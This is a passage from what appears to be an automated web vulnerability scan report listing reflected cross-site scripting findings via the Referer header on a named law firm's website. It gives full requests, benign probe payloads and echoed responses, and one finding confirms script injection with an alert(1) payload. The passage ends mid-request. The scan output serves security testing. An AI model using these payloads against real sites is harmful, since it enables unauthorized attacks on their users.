HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=c77c2"><a>9d93e2dce00">
...[SNIP]...

4.326. http://www.arnoldporter.com/globals_non_discrimination.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_non_discrimination.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92616"><a>de3dc2ef1b7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_non_discrimination.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=92616"><a>de3dc2ef1b7

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=92616"><a>de3dc2ef1b7">
...[SNIP]...

4.327. http://www.arnoldporter.com/globals_operating_status.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_operating_status.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca343"><a>0d72f0518a2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_operating_status.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=ca343"><a>0d72f0518a2

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=ca343"><a>0d72f0518a2">
...[SNIP]...

4.328. http://www.arnoldporter.com/globals_privacy_policy.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_privacy_policy.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313f3"><a>936b59feb4b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_privacy_policy.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=313f3"><a>936b59feb4b

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=313f3"><a>936b59feb4b">
...[SNIP]...

4.329. http://www.arnoldporter.com/globals_statement_clients_rights.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /globals_statement_clients_rights.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92192"><a>3d473dc6629 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /globals_statement_clients_rights.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=92192"><a>3d473dc6629

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=92192"><a>3d473dc6629">
...[SNIP]...

4.330. http://www.arnoldporter.com/home.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /home.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2235a"><a>2aadc693209 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=2235a"><a>2aadc693209

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=2235a"><a>2aadc693209">
...[SNIP]...

4.331. http://www.arnoldporter.com/industries.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /industries.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29b3e"><a>0cbb16e6270 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /industries.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=29b3e"><a>0cbb16e6270

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Industries</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=29b3e"><a>0cbb16e6270">
...[SNIP]...

4.332. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.arnoldporter.com
Path:   /multimedia.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fdc66'-alert(1)-'26a6562a480 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /multimedia.cfm?action=view&id=674&t=event HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=fdc66'-alert(1)-'26a6562a480

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - WEBCAST: Implications of the Dodd-Frank Act for Non-
...[SNIP]...
d_capture_file).click(function() {
                   $.post("process_user_capture.cfm",
                       { name: name,
                        company: company,
                        email: email,
                        from: 'http://www.google.com/search?hl=en&q=fdc66'-alert(1)-'26a6562a480',
                        document: $(this).attr('id').replace('doc', '')
                        },
                       function(data) {
                        }, "json");
                });
               if (requested_capture_forward == '') {
                   setTimeout('$("#doc" + r
...[SNIP]...

4.333. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /multimedia.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50ec5"><a>383cf4ea404 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /multimedia.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=50ec5"><a>383cf4ea404

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Multimedia</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=50ec5"><a>383cf4ea404">
...[SNIP]...

4.334. http://www.arnoldporter.com/news.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /news.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7333"><a>a3f64588368 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /news.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=b7333"><a>a3f64588368

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Press Releases</title>
       <meta name="Description" c
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=b7333"><a>a3f64588368">
...[SNIP]...

4.335. http://www.arnoldporter.com/offices.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /offices.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39941"><a>6ed2a9d4dd6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /offices.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=39941"><a>6ed2a9d4dd6

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Offices</title>
       <meta name="Description" content=
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=39941"><a>6ed2a9d4dd6">
...[SNIP]...

4.336. http://www.arnoldporter.com/practices.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5d0e"><a>3554c2ba7f3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /practices.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=a5d0e"><a>3554c2ba7f3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Practice Areas &amp; Industries</title>
       <meta nam
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=a5d0e"><a>3554c2ba7f3">
...[SNIP]...

4.337. http://www.arnoldporter.com/press_releases.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /press_releases.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aac8"><a>6236487f9fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /press_releases.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=9aac8"><a>6236487f9fd

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Press Releases</title>
       <meta name="Description" c
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=9aac8"><a>6236487f9fd">
...[SNIP]...

4.338. http://www.arnoldporter.com/professionals.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /professionals.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75416"><a>0aa9a2a2b09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /professionals.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=75416"><a>0aa9a2a2b09

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Find an Attorney or Professional</title>
       <meta na
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=75416"><a>0aa9a2a2b09">
...[SNIP]...

4.339. http://www.arnoldporter.com/publications.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /publications.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6ed"><a>0d08c6799e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /publications.cfm?id=2795&action=view HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=1e6ed"><a>0d08c6799e

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Trade mark owner can object to resale of 'perfume te
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=1e6ed"><a>0d08c6799e">
...[SNIP]...

4.340. http://www.arnoldporter.com/remote_access.cfm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /remote_access.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c070"><a>4421a84236f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /remote_access.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
